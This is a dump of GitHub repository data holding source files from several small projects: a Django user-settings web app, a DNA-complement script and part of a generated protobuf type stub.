command=partial(play,-25))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\"<< Previous (Slow)\", width=50, command=partial(play,-2))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Next (Fast) >>\", width=50, command=partial(play,25))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Next (Slow) >>\", width=50, command=partial(play,2))\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Give Not Out\", width=50,command= not_out)\nbtn.pack()\n\nbtn=tkinter.Button(window,text=\" Give Out \", width=50,command= out)\nbtn.pack()\nwindow.mainloop()" } ]
2
See2-io/see2_web
https://github.com/See2-io/see2_web
e2af9008ac27a631dbddb474d08a986ca96c029d
293dace81fd90e7a328086b1443c9cabaafc813b
e07b8350eadfa29cea64e75bf195c59c862c0501
refs/heads/master
2022-12-10T21:40:05.179593
2019-09-03T17:57:22
2019-09-03T17:57:22
183,510,906
0
1
null
2019-04-25T21:16:13
2019-09-03T18:02:03
2022-12-08T06:06:44
JavaScript
[ { "alpha_fraction": 0.6952054500579834, "alphanum_fraction": 0.6952054500579834, "avg_line_length": 19.85714340209961, "blob_id": "a2e4af8d69a130477409e6c9a48c1ca84617b598", "content_id": "cbf5557942d729fb66f72877f9e8c0d1f5232100", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 292, "license_type": "no_license", "max_line_length": 55, "num_lines": 14, "path": "/users/apps.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.apps import AppConfig\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass UsersConfig(AppConfig):\n name = 'users'\n\n\nclass ProfilesConfig(AppConfig):\n name = 'users'\n verbose_name = _('users.profile')\n\n def ready(self):\n import users.signals # noqa\n" }, { "alpha_fraction": 0.5860822200775146, "alphanum_fraction": 0.5896972417831421, "avg_line_length": 27.012659072875977, "blob_id": "c24e9d1a4cc36eec5deb312ae429665443546026", "content_id": "9b7e99ad2c797bb9789a99aaaf3b0e1e49243cb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 75, "num_lines": 79, "path": "/users/forms.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django import forms\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom .models import Profile\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, Row, Column\n\n\nclass CustomUserCreationForm(UserCreationForm):\n\n class Meta(UserCreationForm.Meta):\n model = get_user_model()\n fields = ('email', 'username',)\n\n\nclass CustomUserChangeForm(UserChangeForm):\n\n class Meta:\n model = get_user_model()\n fields = ('email', 'username',)\n\n\n# General Settings\nclass GeneralSettingsForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['first_name', 'last_name',]\n\n\nclass CrispyGeneralSettingsForm(GeneralSettingsForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Row(\n Column('first_name', css_class='form-group col-md-6 mb-0'),\n Column('last_name', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n 'show_btc_price',\n Submit('submit', 'Save')\n )\n\n def save(self, commit=True):\n m = super(GeneralSettingsForm, self).save(commit=False)\n # do custom stuff\n\n if commit:\n m.save()\n return m\n\n\nclass ProfileSettingsForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['first_name', 'last_name',]\n\n\nclass CrispyExchangeSettingsForm(ProfileSettingsForm):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.layout = Layout(\n Row(\n Column('first_name', css_class='form-group col-md-6 mb-0'),\n Column('last_name', css_class='form-group col-md-6 mb-0'),\n css_class='form-row'\n ),\n Submit('submit', 'Save')\n )\n\n def save(self, commit=True):\n m = super(ProfileSettingsForm, self).save(commit=False)\n # do custom stuff\n\n if commit:\n m.save()\n return m\n" }, { "alpha_fraction": 0.6735751032829285, "alphanum_fraction": 0.6735751032829285, "avg_line_length": 23.25, "blob_id": "af60b6cd9c1ce74594ed9f3fb22f629bb9bf50a1", "content_id": "1e5d051774759252981fd3746c15ee63cf2b47e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 71, "num_lines": 8, "path": "/users/urls.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.urls import path\n\nfrom .views import (CrispyGeneralSettingsFormView,\n )\n\nurlpatterns = [\n path('', CrispyGeneralSettingsFormView.as_view(), name='settings'),\n]" }, { "alpha_fraction": 0.6370967626571655, "alphanum_fraction": 0.6411290168762207, "avg_line_length": 26.054546356201172, "blob_id": "2e08bb86c67e04d6b9030a09bc2a17276a1e8077", "content_id": "7f088cfda7d50caf3b9e49d046dac09367b62956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1488, "license_type": "no_license", "max_line_length": 98, "num_lines": 55, "path": "/users/models.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom django.conf import settings\nfrom django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.urls import reverse\n\nfrom . import managers\n\n\nclass CustomUser(AbstractUser):\n USERNAME_FIELD = 'username'\n REQUIRED_FIELDS = ['email',]\n\n def __str__(self):\n return self.email\n\n\nclass Profile(models.Model):\n # Relations\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n related_name='profile',\n verbose_name=_(\"User\"),\n on_delete=models.CASCADE,\n )\n # Attributes - Mandatory\n interaction = models.PositiveIntegerField(\n default=0,\n verbose_name=_(\"interaction\")\n )\n # Attributes - Optional\n # Object Manager\n objects = managers.ProfileManager()\n\n # Custom Properties\n @property\n def username(self):\n return self.user.username\n first_name = models.CharField('First Name', max_length=64, null=True, blank=True, default='',)\n last_name = models.CharField('Last Name', max_length=64, null=True, blank=True, default='',)\n\n # Meta and String\n class Meta:\n verbose_name = _(\"Profile\")\n verbose_name_plural = _(\"Profiles\")\n ordering = ('user',)\n\n # Methods\n def get_absolute_url(self):\n return reverse('settings',)\n # return reverse('settings', kwargs={'pk': self.pk})\n\n def __str__(self):\n return self.user.username\n" }, { "alpha_fraction": 0.4762396812438965, "alphanum_fraction": 0.4793388545513153, "avg_line_length": 29.28125, "blob_id": "40f3d001f9c73130a27c7d62603f379bdcb45e85", "content_id": "4750150782c9f49f761ba67e19ab33626be7abaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 968, "license_type": "no_license", "max_line_length": 77, "num_lines": 32, "path": "/templates/account/settings.html", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "{% extends '_base.html' %}\n{% load static %}\n{% load crispy_forms_tags %}\n\n{% block title %}See2 for the Digital Social Economy{% endblock title %}\n\n{% block content %}\n <div class=\"container\">\n <ul class=\"nav justify-content-center\">\n <li class=\"nav-item\">\n <a class=\"nav-link active\" href=\"\">General settings</a>\n </li>\n <li class=\"nav-item\">\n <a class=\"nav-link\" href=\"profile\">Profile</a>\n </li>\n </ul>\n\n <h1>General Settings</h1>\n <div class=\"card\">\n <div class=\"card-body\">\n <form method=\"POST\" class=\"crispy-general-settings-form\">\n {% csrf_token %}\n {{ form|crispy }}\n <button class=\"btn btn-success\" type=\"submit\">Save</button>\n </form>\n </div>\n <div class=\"card-footer\">\n </div>\n </div>\n\n </div>\n{% endblock content %}" }, { "alpha_fraction": 0.5088028311729431, "alphanum_fraction": 0.5264084339141846, "avg_line_length": 28.947368621826172, "blob_id": "8007f09092080ee51ff3d906e610320352a53d18", "content_id": "0da2d6c19395d8ccf1908abe6e42402015e9d525", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 568, "license_type": "no_license", "max_line_length": 100, "num_lines": 19, "path": "/templates/dashboard/dashboard.html", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "{% extends '_base.html' %}\n{% load static %}\n\n{% block title %}See2 for the Digital Social Economy{% endblock title %}\n\n{% block content %}\n <div class=\"container\">\n <h1>See2</h1>\n <div class=\"card\">\n <img class=\"card-img-top\" src=\"images/dse-800x400.png\" alt=\"The Digital Social Economy\">\n <div class=\"card-body\">\n <p>Stuff here</p>\n </div>\n <div class=\"card-footer\">\n <small class=\"text-muted\">More stuff here</small>\n </div>\n </div>\n\n{% endblock content %}" }, { "alpha_fraction": 0.6795096397399902, "alphanum_fraction": 0.6795096397399902, "avg_line_length": 27.549999237060547, "blob_id": "8ba04d8be802c60deae4001a109b001684dfd30f", "content_id": "c8b06caa79c4fef28a169c8ebc77395cad05442f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 571, "license_type": "no_license", "max_line_length": 56, "num_lines": 20, "path": "/users/signals.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.conf import settings\nfrom .models import Profile\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n profile = Profile.objects.create(\n user=instance,\n first_name='your first name',\n last_name='your last name',\n )\n profile.save()\n\n\n@receiver(post_save, sender=settings.AUTH_USER_MODEL)\ndef save_profile(sender, instance, **kwargs):\n instance.profile.save()\n" }, { "alpha_fraction": 0.6813187003135681, "alphanum_fraction": 0.6813187003135681, "avg_line_length": 30.850000381469727, "blob_id": "883a69a67662cefe7f7d15706add952939aa09c4", "content_id": "7ba5c8f1b62c7feeabd99192200f4b12689eaa0f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1274, "license_type": "no_license", "max_line_length": 87, "num_lines": 40, "path": "/users/views.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import FormView, UpdateView\nfrom django.urls import reverse_lazy\nfrom .forms import (GeneralSettingsForm,\n CrispyGeneralSettingsForm,\n )\nfrom .models import Profile\n\n\nclass GeneralSettingsFormView(LoginRequiredMixin, UpdateView):\n form_class = GeneralSettingsForm\n success_url = reverse_lazy('settings')\n template_name = 'account/settings.html'\n\n\nclass CrispyGeneralSettingsFormView(LoginRequiredMixin, UpdateView):\n model = Profile\n form_class = CrispyGeneralSettingsForm\n success_url = reverse_lazy('settings')\n template_name = 'account/settings.html'\n\n def get_object(self):\n return self.request.user.profile\n\n def get_context_data(self, **kwargs):\n context = super(CrispyGeneralSettingsFormView, self).get_context_data(**kwargs)\n if self.request.POST:\n pass\n else:\n pass\n return context\n\n def form_valid(self, form):\n context = self.get_context_data()\n form.instance.created_by = self.request.user\n # self.object = form.save()\n return super().form_valid(form)\n\n def get_success_url(self):\n return reverse_lazy('settings',)\n" }, { "alpha_fraction": 0.5693069100379944, "alphanum_fraction": 0.5891088843345642, "avg_line_length": 19.299999237060547, "blob_id": "3960b54ff9051b28c87290d70364206b73ac7a35", "content_id": "c0efe6f2dbaed3654176666a83d4744b7a03cb5d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 202, "license_type": "no_license", "max_line_length": 62, "num_lines": 10, "path": "/templates/pages/about.html", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "{% extends '_base.html' %}\n\n{% block title %}About See2{% endblock %}\n\n{% block content %}\n\n <h1>About See2</h1>\n <p>Please contact <a href=\"mailto:info@see2.io\">info@see2.io</a></p>\n\n{% endblock content %}" }, { "alpha_fraction": 0.7768166065216064, "alphanum_fraction": 0.7768166065216064, "avg_line_length": 23.08333396911621, "blob_id": "d43f329ba349df8242510b11759217d013931bcc", "content_id": "90a9f7300e7ae1bcd07abb5555f038d58720d04e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 578, "license_type": "no_license", "max_line_length": 63, "num_lines": 24, "path": "/users/admin.py", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "from django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin\nfrom django.contrib.auth import get_user_model\n\nfrom .forms import CustomUserCreationForm, CustomUserChangeForm\nfrom .models import Profile\n\n\nclass CustomUserAdmin(UserAdmin):\n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n model = get_user_model()\n list_display = ['email', 'username',]\n\n\nadmin.site.register(get_user_model(), CustomUserAdmin)\n\n\n# Register your models here.\nclass ProfileAdmin(admin.ModelAdmin):\n pass\n\n\nadmin.site.register(Profile, ProfileAdmin)\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 6.5, "blob_id": "21f5fac38099f76056ef867fcd373e14f3799107", "content_id": "46cdc88480063aed8049232005270c59fc0d14a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 15, "license_type": "no_license", "max_line_length": 10, "num_lines": 2, "path": "/README.md", "repo_name": "See2-io/see2_web", "src_encoding": "UTF-8", "text": "# See2 Web\nTBD\n" } ]
11
gum5000/DNA-Pride
https://github.com/gum5000/DNA-Pride
3333251c1d615b623011e7042033a29fc8d66643
f59d06836f07e3bb73be7281d9354aff59717f1a
11a85ae18cbf8320ee2258a874ddad415fef79b7
refs/heads/master
2022-07-08T04:16:40.091161
2020-05-11T21:45:36
2020-05-11T21:45:36
263,165,139
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5538461804389954, "alphanum_fraction": 0.5538461804389954, "avg_line_length": 19.526315689086914, "blob_id": "887f25ea6201f60ef34d69a834e13e7aeb97f257", "content_id": "0c342f77d3764d1b8d5fd88b133963f89068334c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 390, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/Main.py", "repo_name": "gum5000/DNA-Pride", "src_encoding": "UTF-8", "text": "numOfCases = int(input())\nfor i in range(numOfCases):\n\tcaseSize = int(input())\n\tDNA = input()\n\t\n\tif(\"U\" in DNA):\n\t\tprint(\"Error RNA nucleobases found!\")\n\telse:\n\t\tDNAPair = \"\"\n\t\tfor j in range(caseSize):\n\t\t\tif(\"A\" in DNA[j]):\n\t\t\t\tDNAPair += \"T\"\n\t\t\telif(\"T\" in DNA[j]):\n\t\t\t\tDNAPair += \"A\"\n\t\t\telif(\"C\" in DNA[j]):\n\t\t\t\tDNAPair += \"G\"\n\t\t\telif(\"G\" in DNA[j]):\n\t\t\t\tDNAPair += \"C\"\n\t\tprint(DNAPair)\n" } ]
1
Kami/python-protobuf-cloud-datastore-entity-translator
https://github.com/Kami/python-protobuf-cloud-datastore-entity-translator
bba77af0681a9a80707d58e261d8af5c7d7ccaa9
f1f6d5b1c2aac7f7c7aa949f3c46dcf13b148659
3e9f690b1a01c12484c8f3cd25d3cec26e3539b6
refs/heads/master
2020-06-06T16:51:47.775050
2020-04-15T15:27:53
2020-04-15T15:27:53
192,796,928
3
0
Apache-2.0
2019-06-19T20:03:36
2019-09-24T16:39:19
2019-09-25T11:25:03
Python
[ { "alpha_fraction": 0.6601941585540771, "alphanum_fraction": 0.8090614676475525, "avg_line_length": 46.53845977783203, "blob_id": "534dea2178f23431e86ac0458a3df9131b9cbef2", "content_id": "afe61e461d9e23a2d2012aad623ef0b5b8eda361", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Go Module", "length_bytes": 618, "license_type": "permissive", "max_line_length": 132, "num_lines": 13, "path": "/tests/integration/go/go.mod", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "module github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/integration/go\n\ngo 1.12\n\nrequire (\n\tcloud.google.com/go v0.43.0 // indirect\n\tgithub.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go v0.0.0-00010101000000-000000000000 // indirect\n\tgithub.com/Sheshagiri/go-protobuf-cloud-datastore-entity-translator v0.0.0-20190716120802-c2a422e5787b\n)\n\nreplace cloud.google.com/go => github.com/Sheshagiri/google-cloud-go v0.41.1-0.20190711043959-301311007500\n\nreplace github.com/Kami/python-protobuf-cloud-datastore-entity-translator/tests/generated/go => ../../generated/go\n" }, { "alpha_fraction": 0.6398038864135742, "alphanum_fraction": 0.6479524970054626, "avg_line_length": 51.850364685058594, "blob_id": "35bef6e3cf1d6913bd087946033b95d3da560c58", "content_id": "c06135d729c964298d88b8da40d00dc5390c761b", "detected_licenses": [ "Python-2.0", "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14481, "license_type": "permissive", "max_line_length": 691, "num_lines": 274, "path": "/tests/generated/example_pb2.pyi", "repo_name": "Kami/python-protobuf-cloud-datastore-entity-translator", "src_encoding": "UTF-8", "text": "# @generated by generate_proto_mypy_stubs.py. Do not edit!\nimport sys\nfrom example2_pb2 import (\n ExampleReferencedType as example2_pb2___ExampleReferencedType,\n)\n\nfrom google.protobuf.descriptor import (\n Descriptor as google___protobuf___descriptor___Descriptor,\n EnumDescriptor as google___protobuf___descriptor___EnumDescriptor,\n)\n\nfrom google.protobuf.internal.containers import (\n RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,\n RepeatedScalarFieldContainer as google___protobuf___internal___containers___RepeatedScalarFieldContainer,\n)\n\nfrom google.protobuf.message import (\n Message as google___protobuf___message___Message,\n)\n\nfrom google.protobuf.struct_pb2 import (\n NullValue as google___protobuf___struct_pb2___NullValue,\n Struct as google___protobuf___struct_pb2___Struct,\n)\n\nfrom google.protobuf.timestamp_pb2 import (\n Timestamp as google___protobuf___timestamp_pb2___Timestamp,\n)\n\nfrom google.type.latlng_pb2 import (\n LatLng as google___type___latlng_pb2___LatLng,\n)\n\nfrom models.example3_pb2 import (\n ExampleWithPackageDBModel as models___example3_pb2___ExampleWithPackageDBModel,\n)\n\nfrom typing import (\n Iterable as typing___Iterable,\n List as typing___List,\n Mapping as typing___Mapping,\n MutableMapping as typing___MutableMapping,\n Optional as typing___Optional,\n Text as typing___Text,\n Tuple as typing___Tuple,\n cast as typing___cast,\n)\n\nfrom typing_extensions import (\n Literal as typing_extensions___Literal,\n)\n\n\nclass ExampleEnumModel(int):\n DESCRIPTOR: google___protobuf___descriptor___EnumDescriptor = ...\n @classmethod\n def Name(cls, number: int) -> str: ...\n @classmethod\n def Value(cls, name: str) -> ExampleEnumModel: ...\n @classmethod\n def keys(cls) -> typing___List[str]: ...\n @classmethod\n def values(cls) -> typing___List[ExampleEnumModel]: ...\n @classmethod\n def items(cls) -> typing___List[typing___Tuple[str, ExampleEnumModel]]: ...\n ENUM0 = typing___cast(ExampleEnumModel, 0)\n ENUM1 = typing___cast(ExampleEnumModel, 1)\n ENUM2 = typing___cast(ExampleEnumModel, 2)\nENUM0 = typing___cast(ExampleEnumModel, 0)\nENUM1 = typing___cast(ExampleEnumModel, 1)\nENUM2 = typing___cast(ExampleEnumModel, 2)\n\nclass ExampleNestedModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key = ... # type: typing___Text\n int32_key = ... # type: int\n enum_key = ... # type: ExampleEnumModel\n\n def __init__(self,\n *,\n string_key : typing___Optional[typing___Text] = None,\n int32_key : typing___Optional[int] = None,\n enum_key : typing___Optional[ExampleEnumModel] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleNestedModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",u\"int32_key\",u\"string_key\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"enum_key\",b\"enum_key\",u\"int32_key\",b\"int32_key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleDBModelWithKey(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n string_key = ... # type: typing___Text\n int32_key = ... # type: int\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n string_key : typing___Optional[typing___Text] = None,\n int32_key : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModelWithKey: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_key\",u\"key\",u\"string_key\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"int32_key\",b\"int32_key\",u\"key\",b\"key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n class MapStringStringEntry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: typing___Text\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[typing___Text] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModel.MapStringStringEntry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n class MapStringInt32Entry(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n key = ... # type: typing___Text\n value = ... # type: int\n\n def __init__(self,\n *,\n key : typing___Optional[typing___Text] = None,\n value : typing___Optional[int] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModel.MapStringInt32Entry: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",u\"value\"]) -> None: ...\n else:\n def ClearField(self, field_name: typing_extensions___Literal[u\"key\",b\"key\",u\"value\",b\"value\"]) -> None: ...\n\n int32_key = ... # type: int\n string_key = ... # type: typing___Text\n bool_key = ... # type: bool\n bytes_key = ... # type: bytes\n double_key = ... # type: float\n float_key = ... # type: float\n int64_key = ... # type: int\n string_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[typing___Text]\n int32_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[int]\n bytes_array_key = ... # type: google___protobuf___internal___containers___RepeatedScalarFieldContainer[bytes]\n enum_key = ... # type: ExampleEnumModel\n null_key = ... # type: google___protobuf___struct_pb2___NullValue\n\n @property\n def map_string_string(self) -> typing___MutableMapping[typing___Text, typing___Text]: ...\n\n @property\n def map_string_int32(self) -> typing___MutableMapping[typing___Text, int]: ...\n\n @property\n def complex_array_key(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[ExampleNestedModel]: ...\n\n @property\n def struct_array_key(self) -> google___protobuf___internal___containers___RepeatedCompositeFieldContainer[google___protobuf___struct_pb2___Struct]: ...\n\n @property\n def timestamp_key(self) -> google___protobuf___timestamp_pb2___Timestamp: ...\n\n @property\n def struct_key(self) -> google___protobuf___struct_pb2___Struct: ...\n\n @property\n def geo_point_key(self) -> google___type___latlng_pb2___LatLng: ...\n\n def __init__(self,\n *,\n int32_key : typing___Optional[int] = None,\n string_key : typing___Optional[typing___Text] = None,\n bool_key : typing___Optional[bool] = None,\n bytes_key : typing___Optional[bytes] = None,\n double_key : typing___Optional[float] = None,\n float_key : typing___Optional[float] = None,\n int64_key : typing___Optional[int] = None,\n map_string_string : typing___Optional[typing___Mapping[typing___Text, typing___Text]] = None,\n map_string_int32 : typing___Optional[typing___Mapping[typing___Text, int]] = None,\n string_array_key : typing___Optional[typing___Iterable[typing___Text]] = None,\n int32_array_key : typing___Optional[typing___Iterable[int]] = None,\n bytes_array_key : typing___Optional[typing___Iterable[bytes]] = None,\n complex_array_key : typing___Optional[typing___Iterable[ExampleNestedModel]] = None,\n struct_array_key : typing___Optional[typing___Iterable[google___protobuf___struct_pb2___Struct]] = None,\n enum_key : typing___Optional[ExampleEnumModel] = None,\n timestamp_key : typing___Optional[google___protobuf___timestamp_pb2___Timestamp] = None,\n struct_key : typing___Optional[google___protobuf___struct_pb2___Struct] = None,\n null_key : typing___Optional[google___protobuf___struct_pb2___NullValue] = None,\n geo_point_key : typing___Optional[google___type___latlng_pb2___LatLng] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"geo_point_key\",u\"struct_key\",u\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",u\"bytes_array_key\",u\"bytes_key\",u\"complex_array_key\",u\"double_key\",u\"enum_key\",u\"float_key\",u\"geo_point_key\",u\"int32_array_key\",u\"int32_key\",u\"int64_key\",u\"map_string_int32\",u\"map_string_string\",u\"null_key\",u\"string_array_key\",u\"string_key\",u\"struct_array_key\",u\"struct_key\",u\"timestamp_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"geo_point_key\",b\"geo_point_key\",u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"bool_key\",b\"bool_key\",u\"bytes_array_key\",b\"bytes_array_key\",u\"bytes_key\",b\"bytes_key\",u\"complex_array_key\",b\"complex_array_key\",u\"double_key\",b\"double_key\",u\"enum_key\",b\"enum_key\",u\"float_key\",b\"float_key\",u\"geo_point_key\",b\"geo_point_key\",u\"int32_array_key\",b\"int32_array_key\",u\"int32_key\",b\"int32_key\",u\"int64_key\",b\"int64_key\",u\"map_string_int32\",b\"map_string_int32\",u\"map_string_string\",b\"map_string_string\",u\"null_key\",b\"null_key\",u\"string_array_key\",b\"string_array_key\",u\"string_key\",b\"string_key\",u\"struct_array_key\",b\"struct_array_key\",u\"struct_key\",b\"struct_key\",u\"timestamp_key\",b\"timestamp_key\"]) -> None: ...\n\nclass ExampleWithReferencedTypeDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n string_key = ... # type: typing___Text\n referenced_enum = ... # type: ExampleEnumModel\n\n @property\n def referenced_type_key(self) -> example2_pb2___ExampleReferencedType: ...\n\n @property\n def referenced_package_type_key(self) -> models___example3_pb2___ExampleWithPackageDBModel: ...\n\n @property\n def referenced_struct_key(self) -> ExampleWithNestedStructDBModel: ...\n\n def __init__(self,\n *,\n string_key : typing___Optional[typing___Text] = None,\n referenced_enum : typing___Optional[ExampleEnumModel] = None,\n referenced_type_key : typing___Optional[example2_pb2___ExampleReferencedType] = None,\n referenced_package_type_key : typing___Optional[models___example3_pb2___ExampleWithPackageDBModel] = None,\n referenced_struct_key : typing___Optional[ExampleWithNestedStructDBModel] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleWithReferencedTypeDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"referenced_package_type_key\",u\"referenced_struct_key\",u\"referenced_type_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"referenced_enum\",u\"referenced_package_type_key\",u\"referenced_struct_key\",u\"referenced_type_key\",u\"string_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"referenced_package_type_key\",b\"referenced_package_type_key\",u\"referenced_struct_key\",b\"referenced_struct_key\",u\"referenced_type_key\",b\"referenced_type_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"referenced_enum\",b\"referenced_enum\",u\"referenced_package_type_key\",b\"referenced_package_type_key\",u\"referenced_struct_key\",b\"referenced_struct_key\",u\"referenced_type_key\",b\"referenced_type_key\",u\"string_key\",b\"string_key\"]) -> None: ...\n\nclass ExampleWithNestedStructDBModel(google___protobuf___message___Message):\n DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...\n\n @property\n def struct_key(self) -> google___protobuf___struct_pb2___Struct: ...\n\n def __init__(self,\n *,\n struct_key : typing___Optional[google___protobuf___struct_pb2___Struct] = None,\n ) -> None: ...\n @classmethod\n def FromString(cls, s: bytes) -> ExampleWithNestedStructDBModel: ...\n def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...\n if sys.version_info >= (3,):\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\"]) -> bool: ...\n def ClearField(self, field_name: typing_extensions___Literal[u\"struct_key\"]) -> None: ...\n else:\n def HasField(self, field_name: typing_extensions___Literal[u\"struct_key\",b\"struct_key\"]) -> bool: ...\n def 